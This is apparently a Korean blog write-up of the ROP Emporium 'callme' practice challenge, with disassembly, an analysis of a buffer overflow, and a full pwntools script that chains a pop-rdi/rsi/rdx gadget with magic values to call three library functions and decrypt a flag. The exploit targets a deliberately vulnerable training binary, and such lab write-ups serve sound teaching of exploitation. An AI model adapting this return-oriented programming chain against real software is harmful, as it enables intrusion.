728x90
반응형
1. intro
2. code 및 분석
2.1. code
usefulFunction
0x00000000004008f2 <+0>: push %rbp
0x00000000004008f3 <+1>: mov %rsp,%rbp
0x00000000004008f6 <+4>: mov $0x6,%edx
0x00000000004008fb <+9>: mov $0x5,%esi
0x0000000000400900 <+14>: mov $0x4,%edi
0x0000000000400905 <+19>: call 0x4006f0 <callme_three@plt>
0x000000000040090a <+24>: mov $0x6,%edx
0x000000000040090f <+29>: mov $0x5,%esi
0x0000000000400914 <+34>: mov $0x4,%edi
0x0000000000400919 <+39>: call 0x400740 <callme_two@plt>
0x000000000040091e <+44>: mov $0x6,%edx
0x0000000000400923 <+49>: mov $0x5,%esi
0x0000000000400928 <+54>: mov $0x4,%edi
0x000000000040092d <+59>: call 0x400720 <callme_one@plt>
0x0000000000400932 <+64>: mov $0x1,%edi
0x0000000000400937 <+69>: call 0x400750 <exit@plt>usefulGadget
0x000000000040093c <+0>: pop %rdi
0x000000000040093d <+1>: pop %rsi
0x000000000040093e <+2>: pop %rdx
0x000000000040093f <+3>: retcallme_one (two, three 모두 비슷함)
0x000000000000081a <+0>: push %rbp
0x000000000000081b <+1>: mov %rsp,%rbp
0x000000000000081e <+4>: sub $0x30,%rsp
0x0000000000000822 <+8>: mov %rdi,-0x18(%rbp)
0x0000000000000826 <+12>: mov %rsi,-0x20(%rbp)
0x000000000000082a <+16>: mov %rdx,-0x28(%rbp)
0x000000000000082e <+20>: movabs $0xdeadbeefdeadbeef,%rax
0x0000000000000838 <+30>: cmp %rax,-0x18(%rbp)
0x000000000000083c <+34>: jne 0x912 <callme_one+248>
0x0000000000000842 <+40>: movabs $0xcafebabecafebabe,%rax
0x000000000000084c <+50>: cmp %rax,-0x20(%rbp)
0x0000000000000850 <+54>: jne 0x912 <callme_one+248>
0x0000000000000856 <+60>: movabs $0xd00df00dd00df00d,%rax
0x0000000000000860 <+70>: cmp %rax,-0x28(%rbp)
0x0000000000000864 <+74>: jne 0x912 <callme_one+248>
0x000000000000086a <+80>: movq $0x0,-0x8(%rbp)
0x0000000000000872 <+88>: lea 0x32f(%rip),%rsi # 0xba8
0x0000000000000879 <+95>: lea 0x32a(%rip),%rdi # 0xbaa
0x0000000000000880 <+102>: call 0x710 <fopen@plt>
0x0000000000000885 <+107>: mov %rax,-0x8(%rbp)
0x0000000000000889 <+111>: cmpq $0x0,-0x8(%rbp)
0x000000000000088e <+116>: jne 0x8a6 <callme_one+140>
0x0000000000000890 <+118>: lea 0x329(%rip),%rdi # 0xbc0
0x0000000000000897 <+125>: call 0x6c0 <puts@plt>
0x000000000000089c <+130>: mov $0x1,%edi
0x00000000000008a1 <+135>: call 0x720 <exit@plt>
0x00000000000008a6 <+140>: mov $0x21,%edi
0x00000000000008ab <+145>: call 0x700 <malloc@plt>
0x00000000000008b0 <+150>: mov %rax,0x2007a9(%rip) # 0x201060 <g_buf>
0x00000000000008b7 <+157>: mov 0x2007a2(%rip),%rax # 0x201060 <g_buf>
0x00000000000008be <+164>: test %rax,%rax
0x00000000000008c1 <+167>: jne 0x8d9 <callme_one+191>
0x00000000000008c3 <+169>: lea 0x318(%rip),%rdi # 0xbe2
0x00000000000008ca <+176>: call 0x6c0 <puts@plt>
0x00000000000008cf <+181>: mov $0x1,%edi
0x00000000000008d4 <+186>: call 0x720 <exit@plt>
0x00000000000008d9 <+191>: mov 0x200780(%rip),%rax # 0x201060 <g_buf>
0x00000000000008e0 <+198>: mov -0x8(%rbp),%rdx
0x00000000000008e4 <+202>: mov $0x21,%esi
0x00000000000008e9 <+207>: mov %rax,%rdi
0x00000000000008ec <+210>: call 0x6f0 <fgets@plt>
0x00000000000008f1 <+215>: mov %rax,0x200768(%rip) # 0x201060 <g_buf>
0x00000000000008f8 <+222>: mov -0x8(%rbp),%rax
0x00000000000008fc <+226>: mov %rax,%rdi
0x00000000000008ff <+229>: call 0x6d0 <fclose@plt>
0x0000000000000904 <+234>: lea 0x2f1(%rip),%rdi # 0xbfc
0x000000000000090b <+241>: call 0x6c0 <puts@plt>
0x0000000000000910 <+246>: jmp 0x928 <callme_one+270>
0x0000000000000912 <+248>: lea 0x301(%rip),%rdi # 0xc1a
0x0000000000000919 <+255>: call 0x6c0 <puts@plt>
0x000000000000091e <+260>: mov $0x1,%edi
0x0000000000000923 <+265>: call 0x720 <exit@plt>
0x0000000000000928 <+270>: nop
0x0000000000000929 <+271>: leave
0x000000000000092a <+272>: ret
2.2. 분석
main과 pwnme 함수는 역시 동일하다.
usefulGadget 및 usefulFunction이 제공되며,
usefulFunction 내에서는 callme_one, two, three를 호출한다.
3. 취약점 확인 및 공격 준비
3.1. 취약점
buffer overflow
3.2. 공격 준비
제공되는 파일은 모두 아래와 같다.
┌[wyv3rn🐲]-(~/rop)
└> ls
callme encrypted_flag.dat key1.dat key2.dat libcallme.so위의 코드와 함께 보면 느낌이 빡 온다.
callme_one / two / three를 호출하면 flag가 decrypt 될 것이라는 느낌이.
callme_one만 보면, rdi, rsi, rdx의 값을 특정 값을 비교해서 맞으면 복호화해준다.
나머지 함수도 마찬가지로 이를 맞춰 호출해주면 된다.
4. exploit
from pwn import *
p = process('./callme')
one = 0x400726
two = 0x400746
three = 0x4006f6
gadget = 0x000000000040093c #rdi rsi rdx ret
pay = b'A'*8*5
pay += p64(gadget)
pay += p64(0xdeadbeefdeadbeef)
pay += p64(0xcafebabecafebabe)
pay += p64(0xd00df00dd00df00d)
pay += p64(one)
pay += p64(gadget)
pay += p64(0xdeadbeefdeadbeef)
pay += p64(0xcafebabecafebabe)
pay += p64(0xd00df00dd00df00d)
pay += p64(two)
pay += p64(gadget)
pay += p64(0xdeadbeefdeadbeef)
pay += p64(0xcafebabecafebabe)
pay += p64(0xd00df00dd00df00d)
pay += p64(three)
p.sendlineafter(b'> ',pay)
p.interactive()728x90
반응형
'Wargame > ROP Emporium' 카테고리의 다른 글
| fluff (0) | 2023.07.07 |
|---|---|
| badchar (0) | 2023.07.07 |
| write4 (0) | 2023.07.07 |
| split (0) | 2023.07.07 |
| ret2win (0) | 2023.07.07 |